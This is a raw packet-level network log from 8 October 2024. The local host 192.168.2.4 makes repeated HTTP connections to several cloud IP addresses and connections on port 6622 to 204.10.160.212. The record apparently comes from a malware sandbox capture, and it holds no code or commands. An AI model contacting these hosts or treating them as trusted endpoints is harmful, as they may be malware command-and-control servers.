                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.707223892 CEST805027047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.707988024 CEST805027047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.710808039 CEST5027080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.711044073 CEST5027080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.715835094 CEST805027047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.813760042 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.820334911 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.820640087 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.820713043 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.820713043 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.825700998 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.825861931 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.933273077 CEST805027254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.933561087 CEST5027280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.933762074 CEST805027254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.933898926 CEST5027280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.938553095 CEST805027254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.079114914 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.079128981 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.079190969 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.079405069 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.079948902 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.080051899 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.081379890 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.081440926 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.082323074 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.082360983 CEST662250273204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.082417965 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.082417965 CEST502736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.082463980 CEST502736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.085582018 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.088620901 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.089472055 CEST662250273204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.090543985 CEST805027535.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.090641975 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.090770960 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.090797901 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.788978100 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.789323092 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.789323092 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.790632963 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.794444084 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.795649052 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.586879969 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.586896896 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.586967945 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.587052107 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.587307930 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.587377071 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589587927 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589660883 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589670897 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589679003 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589708090 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589751959 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589802980 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.592400074 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.596503019 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.791800976 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.797059059 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.797322035 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.798497915 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.798497915 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.800338030 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.803545952 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.803572893 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.805294037 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.805632114 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.806186914 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.806186914 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.811289072 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.811902046 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.851380110 CEST662250280204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.851571083 CEST502806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.851655006 CEST502806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.856513023 CEST662250280204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:25.223740101 CEST502856622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:25.229124069 CEST662250285204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:25.230720043 CEST502856622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:25.234375000 CEST502856622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:25.239510059 CEST662250285204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.411655903 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.418353081 CEST5028680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896574020 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896588087 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896655083 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896655083 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896681070 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896692038 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896703005 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896712065 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896727085 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896778107 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896892071 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.469786882 CEST80502893.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.469835043 CEST5028980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.474230051 CEST80502893.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.506942034 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.511967897 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.512036085 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.512155056 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.512182951 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.517083883 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.517096996 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.977955103 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.978082895 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.978130102 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.978213072 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.983129978 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.994204044 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.999686003 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.999948025 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.999948025 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.999988079 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.004992008 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.005247116 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314007044 CEST805029047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314213991 CEST5029080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314223051 CEST805029047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314275026 CEST5029080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.319056034 CEST805029047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.328171015 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.333064079 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.333139896 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.333334923 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.333334923 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.338212013 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.338356018 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.468184948 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.468341112 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.468379021 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.468379021 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.473256111 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.484683037 CEST5029580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.489541054 CEST80502953.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.490633965 CEST5029580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.490633965 CEST5029580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.490633965 CEST5029580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.495559931 CEST80502953.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.495594978 CEST80502953.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.784411907 CEST662250291204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.784491062 CEST502916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.784638882 CEST502916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.789503098 CEST662250291204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.797868967 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.798019886 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.798139095 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.798170090 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.803102970 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.811388016 CEST5029680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.816284895 CEST805029644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.941013098 CEST503036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.946266890 CEST662250303204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.193026066 CEST805030218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.193175077 CEST5030280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.193192959 CEST805030218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.193248034 CEST5030280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.197998047 CEST805030218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.214502096 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.219662905 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.219722033 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.220072031 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.220093966 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.225208044 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.225219011 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.271675110 CEST805030154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.271842957 CEST805030154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.271927118 CEST5030180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.271965027 CEST5030180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.276803017 CEST805030154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.291306973 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.296260118 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.296320915 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.296818018 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.296818018 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.301877975 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.301894903 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.692353010 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.692538977 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.693367004 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.693484068 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.697580099 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.706682920 CEST5030680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.711613894 CEST805030613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.711704969 CEST5030680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.711848974 CEST5030680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.711868048 CEST5030680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.716974020 CEST805030613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.717565060 CEST805030613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.763098001 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.763329029 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.763412952 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.763735056 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.768244028 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.781363964 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.786581039 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.786662102 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.786889076 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.786911011 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.791822910 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.792363882 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.411268950 CEST5030680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.413072109 CEST5030880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.887947083 CEST662250303204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888380051 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888392925 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888408899 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888489008 CEST662250303204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.358869076 CEST805031154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.359283924 CEST5031180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.359283924 CEST5031180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.364345074 CEST805031154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.371109962 CEST5031480192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.376184940 CEST805031418.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.376261950 CEST5031480192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.376332998 CEST5031580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.377405882 CEST5031480192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.377434015 CEST5031480192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.381289005 CEST805031544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.381360054 CEST5031580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.382292032 CEST805031418.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.382425070 CEST805031418.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.390685081 CEST5031580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.390758991 CEST5031580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.395667076 CEST805031544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.395854950 CEST805031544.221.84.105192.168.2.4
